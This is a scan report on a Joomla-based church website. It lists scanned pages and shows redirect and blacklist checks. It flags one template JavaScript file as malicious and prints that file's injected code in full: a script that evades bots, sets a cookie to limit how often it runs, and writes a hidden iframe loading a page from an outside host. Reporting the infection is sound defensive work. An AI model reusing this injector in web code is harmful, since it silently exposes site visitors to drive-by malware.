Scanned pages/files
Request | Server response | Status |
http://accelerateministries.com/ | 200 OK Content-Length: 14732 Content-Type: text/html | clean |
http://accelerateministries.com/media/system/js/caption.js | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://accelerateministries.com/templates/rt_refraction_j15/js/rokfonts.js | 200 OK Content-Length: 2203 Content-Type: text/javascript | clean |
http://accelerateministries.com/templates/rt_refraction_j15/js/rokutils.js | 200 OK Content-Length: 2563 Content-Type: text/javascript | clean |
http://accelerateministries.com/templates/rt_refraction_j15/js/rokutils.inputs.js | 200 OK Content-Length: 2491 Content-Type: text/javascript | clean |
http://accelerateministries.com/templates/rt_refraction_j15/js/rokmoomenu.js | 200 OK Content-Length: 5047 Content-Type: text/javascript | clean |
http://accelerateministries.com/templates/rt_refraction_j15/js/mootools.bgiframe.js | 200 OK Content-Length: 965 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCookie("akelbriston19ure")===undefined);if(!h()&&i){document.write('<iframe width="112" height="132" style="position:absolute;margin-top:-1002px;" src="http://connorpl.ml/luckyblock17.html"></iframe>');var j=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+j.toUTCString()}})();
Antivirus reports:
http://accelerateministries.com/index.php?option=com_content&view=article&id=1&Itemid=2 | 200 OK Content-Length: 13569 Content-Type: text/html | clean |
http://accelerateministries.com/index.php?option=com_content&view=article&id=1&Itemid=7 | 200 OK Content-Length: 13576 Content-Type: text/html | clean |
http://accelerateministries.com/index.php?option=com_content&view=article&id=2&Itemid=8 | 200 OK Content-Length: 14068 Content-Type: text/html | clean |
http://accelerateministries.com/index.php?option=com_content&view=article&id=3&Itemid=9 | 200 OK Content-Length: 13775 Content-Type: text/html | clean |
http://accelerateministries.com/index.php?option=com_content&view=article&id=4&Itemid=3 | 200 OK Content-Length: 13620 Content-Type: text/html | clean |
http://accelerateministries.com/index.php?option=com_content&view=article&id=4&Itemid=10 | 200 OK Content-Length: 13627 Content-Type: text/html | clean |
http://accelerateministries.com/index.php?option=com_content&view=article&id=5&Itemid=11 | 200 OK Content-Length: 13423 Content-Type: text/html | clean |
http://accelerateministries.com/index.php?option=com_content&view=article&id=9&Itemid=4 | 200 OK Content-Length: 11724 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: accelerateministries.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Wed, 28 Jan 2015 01:20:27 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 28 Jan 2015 01:20:27 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2db4f5f25f138a01a5258e9e796018b5=97he07h6veacmi87hv6higprn6; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: accelerateministries.com
Referer: http://www.google.com/search?q=accelerateministries.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=accelerateministries.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://accelerateministries.com/
Result: accelerateministries.com is not infected or malware details are not published yet.